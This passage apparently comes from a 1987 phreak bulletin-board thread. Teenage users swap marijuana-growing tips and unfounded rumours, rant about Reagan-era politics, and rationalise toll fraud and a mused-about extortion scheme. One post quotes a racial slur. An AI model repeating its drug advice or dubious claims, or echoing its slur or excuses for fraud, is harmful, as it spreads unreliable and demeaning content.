+it over the constitution). I can see them also having orgasms and myocardial
+infarctions when they find plants they think are cannibussativa, only to find
+out they are sewer weeds, things growing from flowing human waste in fields.
+
+
+
+
+
+13/100: well...
+Name: Sir Francis Drake 56
+Date: 8:02 pm  Fri May 01, 1987
+
+Yes, well, (watch this tie-in), to show your beliefes ccall the Libertarian BBs
+in San Jose, CA at:
+
+(408) 243-1933
+
+Its a FIDO system run by the Libertarian Party, for those of you who don't know
+the LP is one of the more popular third parties and has a very laissez faire
+platform, one main tenet being legalization of victemless crimes.  SO call it.
+
+
+sfd
+/l
+
+
+
+14/100: radar
+Name: The Prophet 23
+Date: 4:15 am  Sat May 02, 1987
+
+I kind of find the radar idea a bit spaced out... After all, if it picked up
+pot plants less than 2 feet apart, it would pick up damned near every thing
+else less than 2 feet apart. In decent sized forest, this could amount to
+quite a bit of garbage... weeds, small trees, etc. The police DO ariel
+searches, but I believe (though I'm not sure) that they do it by sight.
+
+They usually do this, though, over state- and company- owned land, as most
+dope-farmers, for some reason, don't own their own forest land. I know for a
+fact that in my area, they do occasional air searches over some forest land
+owned by a paper company, but they don't search the forest behind my house
+owned by my grandfather (otherwise I would be in or under a jail cell now).
+
+-TP
+
+
+15/100: I agree...
+Name: Cat Man 12
+Date: 3:45 pm  Sat May 02, 1987
+
+
+The guy (Prophet) is really right on this one...I've never heard of such crazy
+shit as police radar picking up plants that are 2 feet apart! And he's going to
+grow the stuff thinking shit like this (?).  The one thing to be careful of are
+pirhanas (people who at harvest time go looking for huge fields of pot).
+
+cat man
+
+
+
+
+16/100: I dunno.
+Name: Evil Jay 26
+Date: 1:15 am  Sun May 03, 1987
+
+   I dont really know how it would be possible, but theres still that chance.
+Still no answers on my last question??? Whats the best way to grow it? I heard
+if you dont use fertalizer (sp), then it comes out pretty bad (and makes you
+sick or something - it just isnt any good). Oh well...
+
+-J
+
+
+
+17/100: Read.....
+Name: The Disk Jockey 13
+Date: 2:15 am  Sun May 03, 1987
+
+"High Times" magazine, the best information for any home grower, they have
+monthly sections on indoor and outdoor gardens, for anyone from the first time
+grower, to the expert, plus the ads can help you find the necessary stuff.
+
+                                                 -The Disk Jockey
+
+
+
+
+18/100: do-it-yourself
+Name: The Prophet 23
+Date: 3:03 am  Sun May 03, 1987
+
+You don't have to use fertilizer, but the pot will be weak if it's
+undernourished. Another thing to remember is not to({use too much fertilizer.
+Actually, marijuana is a pretty tough plant, and doesn't really require a
+great deal of care. Just water them daily, and plant them somewhere where they
+can get plenty of sunlight.
+
+  -TP
+
+
+
+19/100: Nameo Changeo
+Name: Knight Lightning 2
+Date: 4:06 pm  Sun May 03, 1987
+
+This is bullshit, what is going on here!?  Next thing you know we will have a
+subboard called "Better Drugs And Gardens."
+
+First of all this police drug radar is the most amazing piece of trash gossip I
+have ever heard.  Police would have better things to do than go through back
+yards with plant radar.  I mean any two objects within 2 feet of each other set
+it off... yeah right.  What about patio furniture, what about a backyard grill
+and gas tank?  What about shrubs or trees?
+
+Whoever came up with this one must have been ON DRUGS himself at the time.
+
+:Knight Lightning
+
+
+
+20/100: I wouldn't put it past them.
+Name: Thomas Covenant 84
+Date: 8:13 pm  Sun May 03, 1987
+
+Although it does sound 99.99% wrong, that's just the sort of thing the cops
+would come up with to act as a deterrent against life. EEEGg.
+
+Two notes of addt'l interest:
+
+-:1- In Virgina Beach, home of the 700 club, it is illegal to imbibe alcohol
+     outdoors. So, if someone was having a beer in his fenced in yard, someone
+     else could call the cops and say "There's a man drinking beer in his
+     backyard.  Please hurry!" and the cops could come and cart him away.
+
+-:2- The latest issue of OMNI has a very fascinating article about the US.
+     Military and how they are linked with US communications services (or would
+     like to be). Needless to say, you should read it.
+
+-:3- OK, so I forgot one (or I can't count. You be the judge). The latest
+     issue of RIP  is the Rock Censorship Issue, and has even MORE fascinating
+     articles on the PMRC, the Back In Control punk/metal deprogramming center,
+     and much much more. Again, you should read it.
+
+Everytime I read something like this, I go out to the fields and have a
+dandelion break. I can't believe stuff like this can happen in America.
+
+
+
+21/100: excuse me
+Name: Lucifer 666 43
+Date: 11:42 pm  Sun May 03, 1987
+
+but my mother was having some trouble growing her geraniums....now if I don't
+use fertilizer will they die...
+
+I hear that the forest preserve can tell huge fields of geraniums if the plants
+are less than 2 feet apart...
+
+usually we plant petunias...but the "sailfish" get them... These are the people
+that rip out huge fields of petunias around blooming time.
+
+L666
+
+
+
+22/100: Censorship
+Name: Phantom Phreaker 46
+Date: 12:58 am  Mon May 04, 1987
+
+  Ok, Thomas Cov, that message you left about Vigriania Beach in Va looked like
+it came from thrasher magainze, as skateboard magazine that I read often.  They
+had an article abou a ramp in VA beach called Mt. Trashmore. Are there any
+skaters on here? I know Quest says he skates...
+
+Phantom
+
+  Oh yeah I also have that new issue or rip, actually it's DP's but I read it
+today about the cencorship. Oh, another thing, I read that MCA of he Beastie
+Boyz died from an OD. I don't know if it's true or a rurmor....
+
+Phantom
+
+(oh god, I just read this post and I have to use the almighty cop-out, ' I am
+fucked up' which is true rnight now)
+
+
+
+23/100: Dope and The Single Woman...
+Name: The Mad Hacker 47
+Date: 1:27 am  Mon May 04, 1987
+
+Well, I find it very hard to believe that someone could detect such plants
+growing so closely together. Secondly, for the outdoor Dope Grower, Simply,
+bury some seeds and forget them for a few months. If You plan on indoor
+growing, You have to understand that Dope is a Weed, so that they don't really
+need sunlight, and would grow in virtually any environment. If you want an
+indoor garden, spend a few bucks and get a hydrpod setup(Articles in
+High-Times) and buy a "Grow and Show" light. I have heard that if you crush up
+Quaaludes and use them as fertalizer, you will come out with some heavy dope.
+
+Just remember that germination is a BIG key in getting something decent. Yes, I
+have grown some in my basement, it wasn't THAT good, but the price was
+right.....
+
+                             The Mad Hacker
+
+
+
+24/100: Dope
+Name: Icarus 15
+Date: 2:34 am  Mon May 04, 1987
+
+Cannabis (sp?) is a weed and can grow anywhere.  However for the best potency,
+good sunlight, water, and fertilizer is needed.  Soaking the seeds for a few
+days in drenched paper is good before planting, just to get the sprouts going.
+
+I don't know about that plant detection nonsense, but I do know that you can
+get capital punishment for selling pot in school. (Thanks Nancy, you
+dragon-witch)
+
+The other day, I read on the back of a coffee can, "Say no to drugs." What
+hypocrosy, no? Caffeine is a much more abused drug and more addictive
+(according to many sources), than a pure 100% natural bowl of grade-a herb.
+Everything is a drug in America:Nicotene, caffeine, money, power, etc.. (uh
+oh, getting metaphorical here)
+
+I must stop rambling and get some sleep. it is 3:32am and I have one of the few
+last days of fucking around in senior year to wake up for tomorrow.
+
+Ic
+
+
+
+25/100: Hmmm....
+Name: Slave Driver
+58
+Date: 9:43 am  Mon May 04, 1987
+
+Considering police radar detects the speed of moving objects, the same
+technique is used for alarm systems, it doesnt care about the speed though,
+just if something is moving, thats why radar detectors often go off around
+stores, I dont know how it would detect plants two feet apart.  What do they
+set the PSD plant spacing detector to 2 feet?  Or do the plants run around
+when noone is looking?
+
+Does a tree that falls in a forest with noone to hear it or record it mae any
+noise?
+
+Why can you see?
+
+How does a can opener work?
+
+What good is school?
+
+Does Ron fuck the dragon-lady?
+
+These are all questions of the mind....
+
+doodoo--doodoo-doodoo-doodoo
+
+twilight zone music^^^
+
+Steve but why? Driver
+
+
+
+
+
+26/100: Say what?
+Name: Cap'N Crax 10
+Date: 3:19 am  Tue May 05, 1987
+
+Did someone say capital punishment
+for selling pot in school?  Jeezus!
+Anyway, police can detect pot, but
+not with radar.  They can detect it
+(even at night), actually, especially
+at night, by it's infrared heat
+signature.  They have some sort of
+device like that...  I don't quite
+remember where this info came from,
+but it was in print, and i assume
+it to be reliable, as it is quite
+possible, and makes more sense than
+plant radar.  Haha...
+
+Did you know that if you try to sprout
+w/ a wet paper towel that is too
+wet you'll drown those 'lil suckers?
+Yep...
+
+C^2
+
+
+
+
+
+27/100: Not into
+Name: Mad Hatter 51
+Date: 2:51 pm  Tue May 05, 1987
+
+I'm not really into the 'growing' process of drugs.  Sounds interesting though
+then again, so does spanish.  But none the less, has the ever been any files on
+it? (hehe)  Maybe a Neon Knight file?  Who knows...
+
+-Hatter
+
+
+
+
+28/100: WELL...
+Name: Sir Francis Drake 56
+Date: 1:07 am  Wed May 06, 1987
+
+YES, I HEARD THE SAME THING ABOUT 'DETECTING POTS IR SIGNATURE'.  IT DOES MAKE
+A FAIR AMOUNT OF SEN...
+
+SFD
+
+
+
+
+29/100: Erb
+Name: Control C 8
+Date: 8:38 pm  Wed May 06, 1987
+
+  Someone once told me that there's male and Female plants, and if there's a
+male plant arond none of the others will grow. Is this true?
+
+Control
+
+Back home a know a few guys, and there idea of fun is being high on crack and
+tilting a machine gun....Time               Time...
+
+Great jam
+
+
+
+
+
+30/100: morf plants
+Name: The Prophet 23
+Date: 11:08 pm  Wed May 06, 1987
+
+No, the female plants will still grow, even around male plants.
+
+ -TP
+
+
+
+
+31/100: Term Papers
+Name: Knight Lightning 2
+Date: 12:26 am  Thu May 07, 1987
+
+Well finally its done.  To be turned in tomorrow.  10 Pages of a "take a stand"
+paper on Euthanasia.  10 sources, 35 endnotes. GeeeeeZ.
+
+:Knight Lightning
+
+
+
+
+32/100: above
+Name: The Leftist 71
+Date: 5:51 am  Thu May 07, 1987
+
+Yeah, I too skate, and have skated Trashmore.. several times.. anyway, about
+this dope issue.. first of all, yes, it can be detected by its ir signature,
+thats so expensive, and time consuming though. Usually what they did where I
+was living was just cruise over the mountians/wooded areas, and If youveever
+seen a pot plant, usually the color gives them away.. I have 12 plants in my
+closet, each about 1' 1/2" tall, which I have had 1 1/2 months... Use miracle
+gro fertilizer. this is best, because it wont burn the plants, as you cannot
+use too much.. also, you definetly dont want to get males and females mixed
+up. the females will have a short growth at the bottom of the stem as they
+mature, which, when broken off will grow right back where it was. I have heard
+of people grafting hops onto plants, and this served an excellent disguise,
+but where can ya get hops??
+
+p.s. call this new bbs if ya get a chance..hack/phreak/special
+interest/g-files, and more..
+
+305-480-9971   initial login pw= CSC
+
+Leftist
+
+
+
+
+33/100: Quotes....
+Name: The Disk Jockey 13
+Date: 6:48 am  Thu May 07, 1987
+
+"Hey, you still look ok!"
+ -Bernard Goetz, just before shooting a nigger in the back a second time.
+
+
+"Your father had AIDS, so I shot him in the back"
+ -Mike D, Beastie Boys
+
+
+                                                 -The Disk Jockey
+
+
+
+
+
+34/100: well...
+Name: Sir Francis Drake 56
+Date: 5:45 pm  Thu May 07, 1987
+
+Well come on KL, dont leave us hanging...what was your "stand" on euthenasia?
+
+(DJ, are you from the South or something?  'Shooting a' WHAT?  I love being
+puritanical..ahem)
+
+sfd
+
+
+
+
+35/100: Religion, Power, Pot
+Name: Doom Prophet 21
+Date: 7:58 pm  Thu May 07, 1987
+
+Prophet raised some good points. Caffeien, Nicotine, and many other drugs are
+harmful to people, yet legal and making money for businesses/government.  A
+local pastor is going after 'porn' menace in the fashion of Edwin Meese, our
+Wedtech, corporate and close minded Attorney General. Why have such small,
+harmless things become a scapegoat bby the fucking religious fanatics and
+power hungry hipocrites as the problem of society? Why don't they direct their
+time and attention to something more worthhile? Why not go after racism,
+sexism, and prejudices of all types? Bad  education systems? Murder, violence,
+War? NO, we are christians (paycheck code word), and everything we do is Ok
+with a creation of our society, but hen it is time to kill for our country,
+well, we can become a christian again after we have killed for a deceptionist
+government.
+
+Meese is going to be in  St. Louis tomorrow talking on abortion. 20 dollars
+for their fucking dinner, maybe they'll be eating government experiments tht
+flopped in nuclear and chemical warfare projects. Abortion should be a
+choice..I agree that it is bad,  but the alternatives can be worse.  If you
+take away the people's choice then what do you have? Guess what I'm a
+communist now because I am a member of the Freeze/Sane movement, ha. Oh well
+I'm rambling and bitching.
+
+'The drugs we're fed to make us like it are God (TM) and Country  with a bang.
+People we know who should know better howl, 'America  Rules, let's go to war!'
+Are the soviets are worst enemy? We're destroying ourselves instead. Who cares
+about our civil rights as long as I get paid?'
+
+Meese Mania is runnnin wild!
+
+Doomy
+
+
+
+
+
+36/100: New Law
+Name: Computer Wiz Kid 54
+Date: 10:19 pm  Thu May 07, 1987
+
+
+Check this OUt....I am not sure if this is federal law coming through, or if
+it is just a local thing.
+
+
+The new law states that haveing Beer or More than 1 Join (like it), and if you
+are under twenty one, you could loose your licence for a year.  Mind you this
+is for people who are Under 21....Nice eh?   THINK thatis bad, how about
+getting caught for have either, and you are under age (21 is the drinking
+age), and you don't drive, you won't be able to drive for a year...
+
+Guess I SHOULD clean out the Car eh?
+
+Cwl-
+
+
+
+
+37/100: Skating/Laws
+Name: Phantom Phreaker 46
+Date: 10:40 pm  Thu May 07, 1987
+
+ Leftist, you skate? That's cool, what kind of board do you have? Do you wear
+jams and surfer clothes, or are you a generally 'normal' looking skater?
+Around here the skaters are mostly dicks they think they are cool because they
+can do a 1 inch ollie, and a lot of them brag and lie about their ability.
+
+ I'm concerned for our countries future. Right-wingers and conservatives are
+fucking up everything, I'm so sick of hearing about their bullshit,
+cencorship, and the like. Some right winger said something along the lines of
+'When a student picks up a math book, he reads that there are no absolutes.
+The next thing you know, he turns to crime and drugs.'
+
+ Now, that takes the cake for being the most foolish, scatterbrained, lame
+attempt to support your views. But, they have the money, funded by Falwell and
+Robertson, who dupe consumers into sending them money so they will 'go to
+heaven' and have 'the lord's blessing'.  'Most people are assholes' (name of a
+tour by some punk band, can't remember the name.)
+
+Oh yesterday I picked up a math book and read that x=0. Well, since x=0, then
+crime is cool, and so is drugs. (This supports my earlier paragraph)
+
+Phantom
+
+PS-Oh yeah, to stretch this thing out even more (this post), I'll just say
+that the Suicidal Tendencies concert in St. Louis a few weeks ago was pretty
+cool. I slammed and dove...total fun.
+
+
+
+38/100: Papers and other
+Name: Knight Lightning 2
+Date: 11:27 pm  Thu May 07, 1987
+
+I said that Euthanasia should be legalized and people should have a right to
+do it if they want (passive) and a person should be allowed to commit suicide
+with a doctor's assistance.
+
+
+Anyway, we were watching a film in psycology last week where the question of
+who has the most primary responsibilty to be careful about birth control, the
+guy or the girl.  One guy said the girl because after all if she doesn't, she
+is the one getting pregnant.  A girl then said that he was an asshole for
+saying that.  What do you think?
+
+:Knight Lightning
+
+
+39/100: Le Dope...(Male And Female)
+Name: The Mad Hacker 47
+Date: 11:51 pm  Thu May 07, 1987
+
+The only difference between Male and Female Plants is that Female PLants yield
+a great deal more seeds than the male ones(Makes sense). Dealers usually try
+to stay away from the female plants due to the "More Seeds, Less Pot"
+Philosophy. Potency should still be the same, though. I have never heard of
+Male Plants keeping all others from growing, though. Something new? Nahh. Gee,
+i am starting to sound like an add from High Times.....
+
+Control C, Have you been trying to call me?
+
+                   -TMH
+
+
+
+
+40/100: Kill-Ron
+Name: Icarus 15
+Date: 12:39 am  Fri May 08, 1987
+
+Right wing conservative fuckers are getting way outta hand!  "Let's not
+discuss the nuclear waste we are putting into the geosphere, and the racism
+overflowing in our country, but let's divert all of our attention on drunk
+drivers under 21, teenage-sex, and the increasingly vicious problem of
+marijuana abuse."  Give me a fucking break Ronnie!  This country is run by
+assholes for assholes because we are falling for this shit.  Nancy thinks
+she's a fucking "vigilante" combatting her war on drugs.  Fuck her and her
+stupid senile old jackass husband.
+
+Think about it....This country raped our environment for bucks for a few
+mogul's pockets.  Ron is a puppet for these war-mongering quadrillionaires who
+are the true rulers of our country.
+
+No other president would EVER have gotten away with what Ronnie did.  He went
+against his word and admitted to have lied in one of the biggesscandals of the
+decade.
+
+After typing this, I feel wired, I feel like fighting someone now..Fuck!
+
+Icarus
+
+
+
+
+41/100: OLD CO
+Name: The Scanner 20
+Date: 1:25 am  Fri May 08, 1987
+
+ I was digging through some old tapes
+tonnight and found and old conference
+from about 2 years ago with John,
+Terminator, and some dudes from Aust-
+ralia. It was kinda rowdy to actually
+hear how stupid we sounded.
+Ah well.
+                       _-The Scanner
+
+
+
+
+42/100: Dope & obscenity
+Name: The Prophet 23
+Date: 2:30 am  Fri May 08, 1987
+
+There is a big difference between the male and female plants... The buds of
+the female plant are much stronger than those of the male plant. By the way,
+who uploaded the file, "drug800s.txt", what the hell are those pills being
+sold (never heard of D&E's before...), and what's the address to order them?
+
+Anyone who wants to know where the country's heading in the future need do
+nothing more than look at the heart of the Southern Baptist Bible Belt, North
+Carolina. The new obscenity law states that "mature adults have no right to
+possess obscene material". X-rated movies are now illegal here, and possession
+of an obscene magazine, even if you only read it in the privacy of your own
+home and are over 21, is punishable by a heavy jail sentence and fine.
+
+  -TP
+
+
+
+
+43/100: D&E....
+Name: The Disk Jockey 13
+Date: 6:46 am  Fri May 08, 1987
+
+D&E is based in New Jersey, and their ad can be found in any High Times....
+I have 2 bottles of stimulants that I got from them, and their yours if you
+want them....one is a bottle of "20-20's" and the others are "357's", I used
+to use them when I'd play tennis to keep a steady, strong game.  Now they just
+make my stomach hurt like hell.  You can get them on your (or someone's) V/MC,
+and they are like $6/100.
+
+                                                 -The Disk Jockey
+
+
+
+
+
+44/100: Better Drugs & Gardens
+Name: Knight Lightning 2
+Date: 7:51 am  Fri May 08, 1987
+
+Er yeah this is our new subboard check out 6.  It seemed like a popular topic
+with you guys.
+
+:Knight Lightning
+
+
+
+
+45/100: well...
+Name: Sir Francis Drake 56
+Date: 6:22 pm  Fri May 08, 1987
+
+Oh what fun! Rag on Reagun, Call him names, Say they suck, bitch alot...
+Oh wow how keen...
+
+Can YOU guess whats coming next?
+
+'CUT THE CRAP' AND *DO* SOMETHING!
+
+My god, I just love to see all these phreaks post about how terrible the right
+wing is and how they should all go to hell and they sound real tough but 'Lets
+take a look at the record'.  Remember the Falwell Game?  And then the Pat
+Robertson game?  It was where you dialed Fallwell or Pat's 800  and then
+hung up after a couple seconds, making them have to pay a $1 or so.  Phreaks
+were the perfect people to do it, programs + knowledge, but NOOOOOO, a few did
+it for a couple of days but they, hell YOU, were tooo fucking lazy to actually
+do shit.  It was people who had to hand dial all the time who did 90% of it.
+
+What politial commitment.  Oh yeah, when Libya was bombed the outrage on
+phreak boards was just tremendous, why I think I saw 1 post against it.  Its
+not until they start doing something that directly affects you (drugs, etc)
+that you get off your ass.
+
+Between computers and phones, yes phreaks could be somewhat of a force, but
+there not.
+
+sfd
+
+
+
+
+46/100: Are you ever happy?
+Name: Phantom Phreaker 46
+Date: 2:13 am  Sat May 09, 1987
+
+ I don't understand why you never say anything good, Drake.. I mean, at least
+the users here are somewhat (even if just a little) conscious of what is going
+on...you can't expect everyone to be totally involved in government, I mean if
+they do THAT, then they will probably start thinking like a politician, and we
+don't need any more of that. Oh, also Drake, do you ever do anything
+constructive, like you said in your post? I'm not trying to argue (I hope you
+see that) but would like to hear what action you take on some of the issues of
+our society (our society, our society, what a drag -Subhumans)
+
+Phantom
+
+
+
+
+
+47/100: well...
+Name: Sir Francis Drake 56
+Date: 6:10 pm  Sat May 09, 1987
+
+What?  Oh my god! Is it true?!  Yes, after many many posts of bitching and
+whining on this board I actually got a RESPONSE!  GASP!  Why I feel positivly
+unignored...
+
+OK, now a response from me would be the normal thing to do now and Im a normal
+sorta guy so...
+
+What do I do 'constructive'?  I call up my congressman, I write my
+congressman/representatives.  Your normal stuff.  Then, I go to
+demonstrations, try to contribute to alternative newspapers,
+draw/write/paint/scriblle thousands of anarchy symbols around the bay area to
+'spread the word'.  I try to keep in contact with other radical organisations
+to contribute my time etc.  Example I have done volunteer work for a small
+communist political party. I could go on, but certainly not for long enough. I
+am not exempt from my own criticism in that I am as lazy as the next guy. But
+I *TRY* harder.
+
+
+hee.
+
+sfd
+
+
+
+
+48/100: Missing the question
+Name: Knight Lightning 2
+Date: 9:39 am  Sun May 10, 1987
+
+But Drake, have you actually called up your congressman or rep or written them
+or been to demostrations?
+
+Now whats this about supporting communist political parties?
+
+:Knight Lightning
+
+
+
+
+49/100: Dont ever...
+Name: Slave Driver 58
+Date: 1:54 pm  Sun May 10, 1987
+
+
+  Expect to get a job with the government, now that you have said that...
+
+Sd
+
+
+
+
+
+50/100: Hmm..
+Name: Doom Prophet 21
+
+I must admit, I have never written my congressman. I have talked to the police
+and authorities about certain laws and policies, and I have pledged some
+support and volunteered to help a political anti-war movement here in St.
+Louis. I try to make people aware of what the government is doing.. I read
+quite a bit on things like that (In mainstream papers and underground
+alternatives like Socialist Labor Party newsletter,SANE mag, The St. Louis
+Arms Freeze forecast letter, People for the American Way, etc.). However I
+can't say that I am really active in politics though.. Oh, I also sent some
+cards in to Reagan opposing censorship movements, with some signatures from my
+school. Wee, big deal right?
+
+Later.
+
+Doom
+
+
+
+
+
+51/100: WELL...
+Name: Sir Francis Drake 56
+Date: 11:58 pm  Sun May 10, 1987
+
+ACTUALLY I WASN'T PLANNING ON GETTING A JOB WITH THE GOVERMENT...
+
+
+And KL, that (calling congressman, etc) was a list of what I have done...what
+did you think it was?  Your confuuuusing me...whine
+
+Yeah being aware is definetly important ('The revoluion begins within' and all
+that)... try to read a equal amount of right wing & left wing periodicals so
+that I dont get locked into one viewpoint on an issue.
+
+But being nformed and not doing anything is no better then being totaly
+apathetic.
+
+
+sfd
+
+
+
+
+52/100: Phrack
+Name: Knight Lightning 2
+Date: 6:44 pm  Mon May 11, 1987
+
+We could unite the entire phreak community through Phrack as aq huge political
+party.  Unfortunately, the majority of the phreak/hack world can't even vote,
+and currently that includes myself.  Also, we would never have enough support
+in any one are to win any form of election but a lobbyist organization seems
+feasible.  But you all know as well as I do that this will NEVER happen.
+
+So, anyway in general with the Class of '87 graduating in less than a month,
+who feels the phreak hack world is going to suffer greatly?
+
+:Knight Lightning
+
+
+
+
+53/100: Politics
+Name: Doom Prophet 21
+Date: 4:57 pm  Tue May 12, 1987
+
+Well, who knows. I'm sure there will always be good phreaks around. I will be
+doing less of course (Graduation, College, Work, etc) but that's no big loss.
+
+About political classifications, I liked the Nolan chart much better than
+traditional Left-Right wing grouping. Most people take left to mean communist
+and opposed to personal freedom. Some of the more famous left wing (radicals)
+are the Black Panthers from the late sixties, and others that I won't mention.
+Right wing conservative policies generally seem to be more realistic (but of
+course because they side with the current system and don't support radical
+change as left wing does). I think we do need change to prevent America from
+becoming a cesspool of violence, money, racism, and exploitation of both
+people and the environment (it's like that now though depending upon your
+viewpoint). It's a difficult question, because the root of the system is
+people-people with stubborn entrenched attitudes. How are we going to change
+the entire system if we can't change ourselves and others around us? Impose a
+law? That would be fascist. In my opinion, freedom of expression and action
+should be allowed so long as it's not causing harm or violence toward the
+innocent (or the not so innocent). The Libertarian party summed it up quite
+well..but a political party doesn't make a perfect system.
+To change the topic slightly, what do you feel about our actions (fraud,
+breaking and entering, etc) as far as morality (flexible and sometimes useless
+term) and justice? (That sounds corny but I don't know how else to word it).
+
+Doom
+
+
+
+
+
+54/100: We The People
+Name: Knight Lightning 2
+Date: 8:15 pm  Tue May 12, 1987
+
+Yeah well, what I was trying to say is that with college in the fall and the
+quite often occurence of 950 blocking from college campuses, a new area to have
+to scan for Telenet dialups or whatever and in general, I fell that as a
+whole, the phreak community will suffer greatly.  Lets face it, there will
+continue to be a phreak community, but as I see it, today's phreaks,
+specifically those on this system or Catch have reached the highest plateau in
+the area of knowledge ever in the history of our community.  This is not to
+say that it will never be surpassed, but somehow with more and more security
+involving itself in our affairs and the decline of interest I feel that this
+is the golden age and it will start to fall back until a new era begins many
+years from now.
+
+The community will continue to exist no matter what, even if for no better
+reason than the rodent wares kids or the habitual code abusers.
+
+As far as morality, I don't feel too concerned about it although I do believe
+it to be wrong.  I try not to think about it too much.  However, when the
+government or Reagan can make deals with terrorist and lose millions of
+dollars or throw it away, I don't feel to guilty about making illegal calls.
+Its all in how you rationalize it.
+
+:Knight Lightning
+
+
+
+
+55/100: KL....
+Name: The Disk Jockey 13
+Date: 6:42 am  Wed May 13, 1987
+
+Gee....isn't speeding illigal too?  Like you said, it's all relative, but can
+you remember making your first code call?  It's like you hang up, and your
+waiting for the phone to ring with someone saying "Your busted......"  I guess
+its all a form of de-sensitizing, after a while, you really ignore or don't
+realize the extent of the illigal-ness of the activity that you are doing.
+
+KL-I'm still working on that "Laws of preaking....." stuff that we talked
+about, while reading over old notes, etc, it can make you realize what you are
+"up against" if you are caught.  Basically, your screwed if an adult.  For the
+most part you are seeing about 30 days jail time, full restitution, and
+assorted court costs.  Not a good time.   I was wasted a few nights ago and
+debated calling up a LD company and telling them that I had hacked EVERY code
+they had, and would sell them the code file for $1000, else turn the file
+public.  Wonder what they would do?  I sure wouldn't want to be the one at the
+bank cashing the check, extorsion (sp?) is pretty big time stuff....
+
+                                            -The Disk Jockey
+
+
+
+56/100: General Nonsense.
+Name: Evil Jay 26
+Date: 8:29 am  Wed May 13, 1987
+
+    Face it folks. Were heading down the long road to communism. Our leaders
+are pretty much all corrupt. I think our country stinks. And I think in a
+few years the "kiddies" will feel the same. Face it, we talk about anti-drug
+bullshit, and all this anti-that and anti-this, but our leaders are setting
+a great example to the future leaders of our country, arent they? This country
+is headed anywhere but uphill, and I hope I die before it all falls to
+peices. Im old enough to vote, but chose not to and never will. I dont care
+about politics even though I should. Id rather not take a small part in the
+downfall of the good ole US of A. I dont follow politics, and I dont watch
+
+..(sorry, double cr) the news. Why? Because its all BAD thats why. Anyway, I
+hope to enjoy my life to the fullest without worrying about stupid shit, like
+Reagan and his scams. One thing that does piss me off is this big drug war.
+Its alot of nonsense if you ask me. The people that end up fucking up there
+lives are the people who have no sense and get burnt on heavy drugs (Coke,
+LSD...etc) and they end up either dead, dying, fucked up or trying to
+rebuild there lives. Needless to say, they forgot about having a good time.
+They got addicted. Stupid, stupid, stupid. Cmon folks, wake up...whats life
+about? Having a good time and living the fullest and richest (I sound like
+an ad for Folgers) life you possibly can Killing yourself isnt the
+answer. I know, Im rambling on. Oh well. About this phreak war thing, we
+all know its bullshit. Ifthe phreaks did unite (something pretty much
+impossible - will never happen), who do you think would win? The government
+or the phreaks? Even if we didnt get caught, we would still lose. The
+puppet-masters have our senile president right where they want him, and
+no matter who does what, they can keep them there for as long as they
+wish. (At least til the end of his term, anyway). Its a suicide mission.
+It cant be won. No one will ever be powerful enough to take on our government.
+No one but non-americans would aid him, and theres too many people afraid
+of the "bomb" for that too happen. So all we could do is piss them off, thus
+giving them an even better reason to exterminate us all. Anyway, thats about
+all I have to say on the matter(s).
+
+Sure Im for the American Way. Its the people who are trying to fuck it
+up for all of us that I dont like...
+
+-J
+
+
+
+57/100: WELL...
+Name: <<< Sir Francis Drake 56 >>>
+Date: 4:22 pm  Wed May 13, 1987
+
+lets see...
+
+a) Yeah KL, after this year there will be a 'drop' in the phreak scene as lots
+   of people go off to college but after awhile new phreaks will come to
+replace them.  This certainly isnt 'The Golden Age of phreaking'.  Wait
+   until the who country is tied into a network, when EVERYTHING is on
+   computers, and the phone system connects the whole world in a standardised
+   way.  THAT will be the 'golden age'.
+
+b) EJ, the people who 'are trying to fuck it up' are the people who are too
+   fucking lazy to get involved....
+
+sfd
+
+
+
+
+58/100: Golden Age
+Name: Knight Lightning 2
+Date: 5:34 pm  Wed May 13, 1987
+
+Actually Sfd, this is the Golden Age, becuae by the time the whole world is
+networked like you said, there will be so much security and tracing will be a
+standard feature and we will be even more stuck than ever before.
+
+EJ, you can't solve a problem by ignoring it.  Not voting is stupid unless you
+don't know how to vote. That is you don't know which side is more worthy (if
+any) of your vote.
+
+Phreaks as a force?  Make a great movie, but it'll never ever happen.
+
+:Knight Lightning
+
+
+
+59/100: KL......
+Name: The Disk Jockey 13
+Date: 7:59 pm  Wed May 13, 1987
+
+...and any other St. Louis locals, why don't you invite some (actually lots)
+or chicks to come to the party part of this convention?  EVERYBODY likes hotel
+parties, I've had a few in Kansas City at the Embassy Suits that were secondto
+(to) none!  Besides, not all of us are gonna get off on B-Way.....
+
+I want to get something out of this trip besides hung over.....
+
+
+I'll show them (the girls) my Cosmos manuals and impress them!  Ya, right.....
+
+
+
+60/100: Well
+Name: Knight Lightning 2
+Date: 10:45 pm  Wed May 13, 1987
+
+Things would definately get out of hand if we did that.  I mean the word would
+spread and then the whole idea of having a phreak con would be gone.  Plus we
+would definately end up being thrown out.
+
+Still, anyone else have any input on this?
+
+:Knight Lightning
+
+
+61/100: getting back to...
+Name: Lex Luthor 36
+Date: 10:02 am  Fri May 15, 1987
+
+Getting back to that "golden age" deal, well I am sure there will be a time
+when more and more things will be networked, but saying they will have all this
+security and tracing shit is ridiculous. There will always be bugs and holes to
+be exploited, and security always comes last for everything. The only people
+who think security should come first are the ones whose job is security. Making
+products, consulting, etc. Everyone else puts security low on the list. It will
+probably remain that way indefinitely. Look at the show Max Headroom. I think
+it is one of the best shows on TV. A lot of people don't like it. They don't
+understand it. Sure some things are a bit ridiculous like the old-style
+typewriter keys used for computer keyboards, but basically the show is quite
+interesting. It appears that just about everything in existance is networked in
+some way to some central processor. Every building, and everything within those
+buildings are networked. Ang gaining access to the network, allows you to gain
+access to just about anything, assuming you can defeat any security involved. I
+like the show mainly due to the security and insecurity involved. They are
+constantly breaking the security on everything.
+
+The show probably is based on some variation of the future, and it does show
+that no matter how sophisticated things get, there always will be ways around
+it. Having the ability to defeat these controls, allows you to have control
+over your own destiny as far as concepts of 'big brother' are concerned.
+
+If the government turned into the big brother depicted in 1984, I am sure
+those "good enough" would not be as affected. They would simply find ways to
+get around controls and modify or neutralize anything that was threating to
+them.
+
+Since everyone has been rambling, I thought I would ramble some too.
+
+
+
+
+62/100: SFD's Comments
+Name: Lotus 38
+Date: 1:40 pm  Fri May 15, 1987
+
+I also have to disagree with your first comment.  Just because everyone is
+going to college does not mean we will loose that many people.  When I left
+about 2 years ago, I still tried to call here as much as I could.  Taran (or
+Knight) did bring up a good point about college systems getting smarter but if
+you go to a college that is good enough to have phones in each of the dorms (or
+if you live in an apartment) then most of the time you don't have a thing to
+worry about.
+
+
+
+63/100: well...
+Name: Sir Francis Drake 56
+Date: 11:16 pm  Fri May 15, 1987
+
+Actually, the idea of losing people due to college was KL's postulate... and I
